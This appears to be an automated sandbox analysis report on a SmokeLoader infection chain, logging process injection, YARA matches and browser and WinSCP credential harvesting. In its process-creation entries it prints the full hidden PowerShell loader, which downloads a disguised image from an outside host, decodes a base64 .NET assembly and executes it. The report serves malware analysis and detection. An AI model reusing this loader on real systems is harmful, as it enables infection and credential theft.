Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 95102D	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 95102D	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 95102D	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 95102D	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 95102D	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	Code function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep, explorer.exe		28_2_000C1016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep, explorer.exe		28_2_000C10A5

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\rugtucw C:\Users\user\AppData\Roaming\rugtucw	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredgdgtrenqdgtrevdgtredcdgtremgdgtrewdgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredydgtremwdgtrewdgtredcdgtrengdgtrezdgtredqdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links \| get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.gbr/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))} }"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredgdgtrenqdgtrevdgtredcdgtremgdgtrewdgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredydgtremwdgtrewdgtredcdgtrengdgtrezdgtredqdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links \| get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.gbr/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))} }"	Jump to behavior

Source: explorer.exe, 0000000E.00000002.605324960.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.464250384.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman-
Source: explorer.exe, 0000000E.00000000.464565852.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.605761304.0000000000720000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000E.00000000.464565852.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.605761304.0000000000720000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000E.00000002.605761304.0000000000720000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Managers+F
Source: explorer.exe, 0000000E.00000000.464565852.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.605761304.0000000000720000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: !Progman

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 18_2_000D55EB cpuid

18_2_000D55EB

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rugtucw	Queries volume information: C:\Users\user\AppData\Roaming\rugtucw VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 18_2_00082112 GetSystemTimeAsFileTime,_alldiv,wsprintfA,

18_2_00082112

Source: C:\Windows\explorer.exe

Code function: 14_2_03F13490 GetUserNameW,

14_2_03F13490

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 18_2_00082198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,

18_2_00082198

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.605299369.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3192, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR
Source: Yara match	File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.467103946.0000000000131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.467072313.0000000000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\moz-safe-about+home\.metadata-v2
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\xulstore.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\datareporting\state.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\compatibility.ini
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\content-prefs.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\chrome\.metadata-v2
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\search.json.mozlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\jetpack\@all-aboard-v1-6\simple-storage\store.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\mimeTypes.rdf
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\chrome\.metadata
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\permissions.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\datareporting\session-state.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\datareporting\archived\2017-10\1508238380992.d07fbb40-1c13-49f0-9742-db90c57c7811.main.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\SiteSecurityServiceState.txt
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\moz-safe-about+home\.metadata
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\addons.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\SecurityPreloadState.txt
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\saved-telemetry-pings\d07fbb40-1c13-49f0-9742-db90c57c7811
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
